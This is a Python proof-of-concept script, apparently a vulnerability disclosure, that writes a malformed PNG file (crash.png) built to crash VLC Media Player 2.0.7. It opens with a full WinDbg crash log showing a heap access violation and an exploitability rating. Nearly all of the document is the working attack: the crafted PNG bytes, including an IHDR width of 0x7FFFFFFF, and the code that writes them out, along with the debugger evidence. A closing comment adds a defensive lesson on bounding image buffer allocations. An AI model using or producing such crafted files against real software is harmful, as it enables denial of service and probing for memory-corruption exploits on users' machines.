#!/usr/bin/python
# VLC Media Player 2.0.7 PNG Crash PoC
# Vendor Homepage: http://www.videolan.org/
# Version: 2.0.7
# Tested on: Windows 7 64-bit
# Author: Kevin Fujimoto
# Debug Information:
# Microsoft (R) Windows Debugger Version 6.12.0002.633 X86
# Copyright (c) Microsoft Corporation. All rights reserved.
# *** wait with pending attach
# Symbol search path is: SRV*g:\symbols*http://msdl.microsoft.com/download/symbols
# Executable search path is:
# ModLoad: 00400000 00425000 G:\Program Files (x86)\VideoLAN\VLC\vlc.exe
# ModLoad: 775b0000 77730000 C:\Windows\SysWOW64\ntdll.dll
# ModLoad: 750f0000 75200000 C:\Windows\syswow64\kernel32.dll
# ModLoad: 76100000 76147000 C:\Windows\syswow64\KERNELBASE.dll
# ModLoad: 623e0000 6240c000 G:\Program Files (x86)\VideoLAN\VLC\libvlc.dll
# ModLoad: 50420000 5066d000 G:\Program Files (x86)\VideoLAN\VLC\libvlccore.dll
# ModLoad: 75ab0000 75b50000 C:\Windows\syswow64\ADVAPI32.dll
# ModLoad: 76170000 7621c000 C:\Windows\syswow64\msvcrt.dll
# ModLoad: 76150000 76169000 C:\Windows\SysWOW64\sechost.dll
# ModLoad: 75210000 75300000 C:\Windows\syswow64\RPCRT4.dll
# ModLoad: 75000000 75060000 C:\Windows\syswow64\SspiCli.dll
# ModLoad: 74ff0000 74ffc000 C:\Windows\syswow64\CRYPTBASE.dll
# ModLoad: 76390000 76fda000 C:\Windows\syswow64\SHELL32.DLL
# ModLoad: 76230000 76287000 C:\Windows\syswow64\SHLWAPI.dll
# ModLoad: 75dd0000 75e60000 C:\Windows\syswow64\GDI32.dll
# ModLoad: 75ca0000 75da0000 C:\Windows\syswow64\USER32.dll
# ModLoad: 760f0000 760fa000 C:\Windows\syswow64\LPK.dll
# ModLoad: 75bf0000 75c8d000 C:\Windows\syswow64\USP10.dll
# ModLoad: 71880000 718b2000 C:\Windows\system32\WINMM.DLL
# ModLoad: 75590000 755c5000 C:\Windows\syswow64\WS2_32.dll
# ModLoad: 75300000 75306000 C:\Windows\syswow64\NSI.dll
# ModLoad: 75730000 75735000 C:\Windows\syswow64\PSAPI.DLL
# ModLoad: 75750000 75908000 C:\Windows\syswow64\WININET.DLL
# ModLoad: 75be0000 75be4000 C:\Windows\syswow64\api-ms-win-downlevel-user32-l1-1-0.dll
# ModLoad: 77580000 77585000 C:\Windows\syswow64\api-ms-win-downlevel-advapi32-l1-1-0.dll
# ModLoad: 76220000 76224000 C:\Windows\syswow64\api-ms-win-downlevel-shlwapi-l1-1-0.dll
# ModLoad: 75c90000 75c94000 C:\Windows\syswow64\api-ms-win-downlevel-version-l1-1-0.dll
# ModLoad: 74df0000 74df9000 C:\Windows\system32\version.DLL
# ModLoad: 75a40000 75a43000 C:\Windows\syswow64\api-ms-win-downlevel-normaliz-l1-1-0.dll
# ModLoad: 75740000 75743000 C:\Windows\syswow64\normaliz.DLL
# ModLoad: 75310000 75508000 C:\Windows\syswow64\iertutil.dll
# ModLoad: 75a50000 75ab0000 C:\Windows\system32\IMM32.DLL
# ModLoad: 762c0000 7638c000 C:\Windows\syswow64\MSCTF.dll
# ModLoad: 10000000 10059000 C:\Windows\SysWOW64\guard32.dll
# ModLoad: 74de0000 74de7000 C:\Windows\system32\fltlib.dll
# ModLoad: 755d0000 7572c000 C:\Windows\syswow64\ole32.dll
# ModLoad: 73d90000 73d9b000 C:\Windows\system32\profapi.dll
# ModLoad: 720f0000 72170000 C:\Windows\system32\uxtheme.dll
# ModLoad: 73cb0000 73cc3000 C:\Windows\system32\dwmapi.dll
# ModLoad: 71f50000 720ee000 C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
# ModLoad: 75060000 750e3000 C:\Windows\syswow64\CLBCatQ.DLL
# ModLoad: 75b50000 75bdf000 C:\Windows\syswow64\OLEAUT32.dll
# ModLoad: 61070000 610bc000 G:\Program Files (x86)\VideoLAN\VLC\plugins\access\libdshow_plugin.dll
# ModLoad: 5bf20000 5bf3c000 G:\Program Files (x86)\VideoLAN\VLC\plugins\audio_output\libaout_directx_plugin.dll
# ModLoad: 5bf00000 5bf1d000 G:\Program Files (x86)\VideoLAN\VLC\plugins\audio_output\libwaveout_plugin.dll
# ModLoad: 5b850000 5b874000 G:\Program Files (x86)\VideoLAN\VLC\plugins\video_output\libdirectx_plugin.dll
# ModLoad: 5b830000 5b849000 G:\Program Files (x86)\VideoLAN\VLC\plugins\mmxext\libmemcpymmxext_plugin.dll
# ModLoad: 5b7f0000 5b82f000 G:\Program Files (x86)\VideoLAN\VLC\plugins\access\liblibbluray_plugin.dll
# ModLoad: 59020000 59048000 G:\Program Files (x86)\VideoLAN\VLC\plugins\access\libaccess_bd_plugin.dll
# ModLoad: 57fb0000 58001000 G:\Program Files (x86)\VideoLAN\VLC\plugins\access\libdvdnav_plugin.dll
# ModLoad: 5b7d0000 5b7eb000 G:\Program Files (x86)\VideoLAN\VLC\plugins\access\libaccess_vdr_plugin.dll
# ModLoad: 5b760000 5b77b000 G:\Program Files (x86)\VideoLAN\VLC\plugins\access\libfilesystem_plugin.dll
# ModLoad: 50830000 508ac000 G:\Program Files (x86)\VideoLAN\VLC\plugins\stream_filter\libstream_filter_httplive_plugin.dll
# ModLoad: 50370000 50420000 G:\Program Files (x86)\VideoLAN\VLC\plugins\stream_filter\libstream_filter_dash_plugin.dll
# ModLoad: 59060000 5907a000 G:\Program Files (x86)\VideoLAN\VLC\plugins\access\libstream_filter_rar_plugin.dll
# ModLoad: 58040000 58065000 G:\Program Files (x86)\VideoLAN\VLC\plugins\access\libzip_plugin.dll
# ModLoad: 58020000 58039000 G:\Program Files (x86)\VideoLAN\VLC\plugins\stream_filter\libstream_filter_record_plugin.dll
# ModLoad: 57bb0000 57bda000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libplaylist_plugin.dll
# ModLoad: 50210000 5036f000 G:\Program Files (x86)\VideoLAN\VLC\plugins\meta_engine\libtaglib_plugin.dll
# ModLoad: 57b50000 57baa000 G:\Program Files (x86)\VideoLAN\VLC\plugins\lua\liblua_plugin.dll
# ModLoad: 500c0000 50202000 G:\Program Files (x86)\VideoLAN\VLC\plugins\misc\libxml_plugin.dll
# ModLoad: 57cd0000 57ced000 G:\Program Files (x86)\VideoLAN\VLC\plugins\control\libhotkeys_plugin.dll
# ModLoad: 57970000 57989000 G:\Program Files (x86)\VideoLAN\VLC\plugins\control\libglobalhotkeys_plugin.dll
# ModLoad: 68cf0000 697d9000 G:\Program Files (x86)\VideoLAN\VLC\plugins\gui\libqt4_plugin.dll
# ModLoad: 75510000 7558b000 C:\Windows\syswow64\COMDLG32.DLL
# ModLoad: 72230000 72281000 C:\Windows\system32\WINSPOOL.DRV
# ModLoad: 72330000 72337000 C:\Windows\system32\WSOCK32.DLL
# ModLoad: 73da0000 73db7000 C:\Windows\system32\userenv.dll
# ModLoad: 72200000 72216000 C:\Windows\system32\CRYPTSP.dll
# ModLoad: 72180000 721bb000 C:\Windows\system32\rsaenh.dll
# ModLoad: 73a60000 73a6e000 C:\Windows\system32\RpcRtRemote.dll
# ModLoad: 507d0000 50828000 G:\Program Files (x86)\VideoLAN\VLC\plugins\services_discovery\libupnp_plugin.dll
# ModLoad: 72650000 7266c000 C:\Windows\system32\IPHLPAPI.DLL
# ModLoad: 72640000 72647000 C:\Windows\system32\WINNSI.DLL
# ModLoad: 57940000 57965000 G:\Program Files (x86)\VideoLAN\VLC\plugins\services_discovery\libsap_plugin.dll
# ModLoad: 57160000 5717a000 G:\Program Files (x86)\VideoLAN\VLC\plugins\services_discovery\libpodcast_plugin.dll
# ModLoad: 56d90000 56daa000 G:\Program Files (x86)\VideoLAN\VLC\plugins\services_discovery\libmediadirs_plugin.dll
# ModLoad: 507b0000 507c9000 G:\Program Files (x86)\VideoLAN\VLC\plugins\services_discovery\libwindrive_plugin.dll
# ModLoad: 62da0000 62f0f000 C:\Windows\system32\explorerframe.dll
# ModLoad: 62d70000 62d9f000 C:\Windows\system32\DUser.dll
# ModLoad: 62cb0000 62d62000 C:\Windows\system32\DUI70.dll
# ModLoad: 730c0000 73144000 C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
# ModLoad: 77c00000 77c40000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libmp4_plugin.dll
# ModLoad: 77bd0000 77bf5000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libavi_plugin.dll
# ModLoad: 77ba0000 77bc2000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libasf_plugin.dll
# ModLoad: 77b80000 77b9b000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libflacsys_plugin.dll
# ModLoad: 50790000 507ab000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libes_plugin.dll
# ModLoad: 69830000 69857000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libmpc_plugin.dll
# ModLoad: 61c90000 61cab000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libnuv_plugin.dll
# ModLoad: 6bbb0000 6bbca000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libtta_plugin.dll
# ModLoad: 675f0000 6760b000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libwav_plugin.dll
# ModLoad: 6aaf0000 6abdb000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libsid_plugin.dll
# ModLoad: 69d90000 69eb8000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libmkv_plugin.dll
# ModLoad: 6ccd0000 6cd86000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\liblive555_plugin.dll
# ModLoad: 6ef10000 6ef3b000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libogg_plugin.dll
# ModLoad: 70950000 70969000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libdirac_plugin.dll
# ModLoad: 644f0000 6450a000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libsmf_plugin.dll
# ModLoad: 64370000 6438a000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\librawvid_plugin.dll
# ModLoad: 6c2c0000 6c2da000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libpva_plugin.dll
# ModLoad: 6a510000 6a53f000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libts_plugin.dll
# ModLoad: 67f30000 67f4a000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libnsv_plugin.dll
# ModLoad: 6f980000 6f999000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libau_plugin.dll
# ModLoad: 6a6e0000 6a74f000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libgme_plugin.dll
# ModLoad: 6c5e0000 6c5fa000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libvoc_plugin.dll
# ModLoad: 64810000 64829000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libxa_plugin.dll
# ModLoad: 071a0000 072ad000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libmod_plugin.dll
# ModLoad: 66c10000 66c2a000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libaiff_plugin.dll
# ModLoad: 060b0000 060cb000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libimage_plugin.dll
# ModLoad: 77b40000 77b7e000 G:\Program Files (x86)\VideoLAN\VLC\plugins\codec\libpng_plugin.dll
# (1e8c.1954): Access violation - code c0000005 (!!! second chance !!!)
# eax=072b0048 ebx=00ab0000 ecx=00000000 edx=00000000 esi=072b0040 edi=00ab0000
# eip=775eb6d8 esp=0658daf4 ebp=0658dbc4 iopl=0 nv up ei pl nz na po nc
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
# ntdll!RtlpAllocateHeap+0x7fb:
# 775eb6d8 8b09 mov ecx,dword ptr [ecx] ds:002b:00000000=????????
# 0:009> !exploitable -v
# HostMachine\HostUser
# Executing Processor Architecture is x86
# Debuggee is in User Mode
# Debuggee is a live user mode debugging session on the local machine
# Event Type: Exception
# *** ERROR: Module load completed but symbols could not be loaded for G:\Program Files (x86)\VideoLAN\VLC\vlc.exe
# Exception Faulting Address: 0x0
# Second Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
# Exception Sub-Type: Read Access Violation
# Faulting Instruction:775eb6d8 mov ecx,dword ptr [ecx]
# Basic Block:
# 775eb6d8 mov ecx,dword ptr [ecx]
# Tainted Input Operands: ecx
# 775eb6da mov edx,dword ptr [edx+4]
# 775eb6dd cmp ecx,edx
# Tainted Input Operands: ecx
# 775eb6df jne ntdll!rtlpallocateheap+0x8e4 (7763af86)
# Tainted Input Operands: ZeroFlag
# Exception Hash (Major/Minor): 0x65193219.0x71557302
# Stack Trace:
# ntdll!RtlpAllocateHeap+0x7fb
# ntdll!RtlAllocateHeap+0x23a
# msvcrt!_calloc_impl+0x136
# msvcrt!_calloc_crt+0x16
# msvcrt!_getbuf+0x11
# msvcrt!_flsbuf+0x94
# msvcrt!_fputwc_nolock+0xd5
# msvcrt!fputwc+0x51
# vlc+0x5975
# vlc+0x97ee
# vlc+0x700b
# msvcrt!_wsopen_s+0x1b
# msvcrt!_unlock+0x15
# msvcrt!_iob+0x60
# ntdll!ExecuteHandler2+0x26
# Instruction Address: 0x00000000775eb6d8
# Description: Data from Faulting Address controls Branch Selection
# Short Description: TaintedDataControlsBranchSelection
# Exploitability Classification: UNKNOWN
# Recommended Bug Title: Data from Faulting Address controls Branch Selection starting at ntdll!RtlpAllocateHeap+0x00000000000007fb called from msvcrt!_calloc_impl+0x0000000000000136 (Hash=0x65193219.0x71557302)
# The data from the faulting address is later used to determine whether or not a branch is taken.
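# --- PoC file contents -------------------------------------------------------
# Minimal PNG whose IHDR declares a width of 0x7FFFFFFF (the largest value the
# PNG specification permits) and a height of 258, for a 1-bit indexed-colour
# image with a 3-byte PLTE, a 1-byte tRNS and a 1-byte IDAT payload. The WinDbg
# output above shows the fault inside ntdll's heap allocator (reached through
# msvcrt calloc) after libpng_plugin.dll has been loaded, which is consistent
# with heap state having been corrupted earlier in the decode path; the root
# cause is not established by this report. Chunk CRCs are reproduced from the
# original report byte-for-byte and are deliberately not recomputed.
# Defensive takeaway: image decoders should check width * height * bytes-per-
# pixel against an overflow-safe bound before allocating row or image buffers.
OUTPUT_PATH = 'crash.png'

# Kept as a module-level name so anything that referenced ``out`` still works.
# ``b""`` literals make the payload bytes on both Python 2 and Python 3; the
# original plain ``"..."`` literals are ``str`` on Python 3 and cannot be
# written to a file opened in binary mode.
out = (
    b"\x89\x50\x4E\x47\x0D\x0A\x1A\x0A"  # PNG signature
    b"\x00\x00\x00\x0D"                  # IHDR size
    b"\x49\x48\x44\x52"                  # IHDR chunk
    b"\x7F\xFF\xFF\xFF"                  # width (2**31 - 1, spec maximum)
    b"\x00\x00\x01\x02"                  # height (258)
    b"\x01"                              # bit depth
    b"\x03"                              # color type (indexed colour)
    b"\x00"                              # compression method
    b"\x00"                              # filter method
    b"\x00"                              # interlace method
    b"\xBA\x1B\xD8\x84"                  # IHDR chunk CRC (from original report)
    b"\x00\x00\x00\x03"                  # PLTE size
    b"\x50\x4C\x54\x45"                  # PLTE chunk
    b"\xFF"                              # red
    b"\xFF"                              # green
    b"\xFF"                              # blue
    b"\xA7\xC4\x1B\xC8"                  # PLTE chunk CRC (from original report)
    b"\x00\x00\x00\x01"                  # tRNS size
    b"\x74\x52\x4E\x53"                  # tRNS chunk
    b"\x00"                              # alpha
    b"\x40\xE6\xD8\x66"                  # tRNS chunk CRC (from original report)
    b"\x00\x00\x00\x01"                  # IDAT size
    b"\x49\x44\x41\x54"                  # IDAT chunk
    b"\xFF"                              # image data (single byte)
    b"\x05\x3A\x92\x65"                  # IDAT chunk CRC (from original report)
    b"\x00\x00\x00\x00"                  # IEND size
    b"\x49\x45\x4E\x44"                  # IEND chunk
    b"\xAE\x42\x60\x82"                  # IEND chunk CRC
)


def write_poc(path=OUTPUT_PATH, data=out):
    """Write *data* to *path* in binary mode.

    Args:
        path: destination file name; defaults to ``crash.png`` in the
            current directory, as in the original script.
        data: the bytes to write; defaults to the PNG above.

    Returns:
        Whatever ``write`` returns (the byte count on Python 3).

    The ``with`` block closes the handle even if the write raises, and the
    handle is no longer bound to ``file``, which shadowed the builtin.
    """
    with open(path, 'wb') as fh:
        return fh.write(data)


def main():
    """Script entry point: announce, write the PoC file, confirm."""
    print("Writing file...")
    write_poc()
    print("File written!")


# Guarded so importing this module (e.g. to inspect ``out``) does not write
# a file as a side effect; running it as a script behaves as before.
if __name__ == "__main__":
    main()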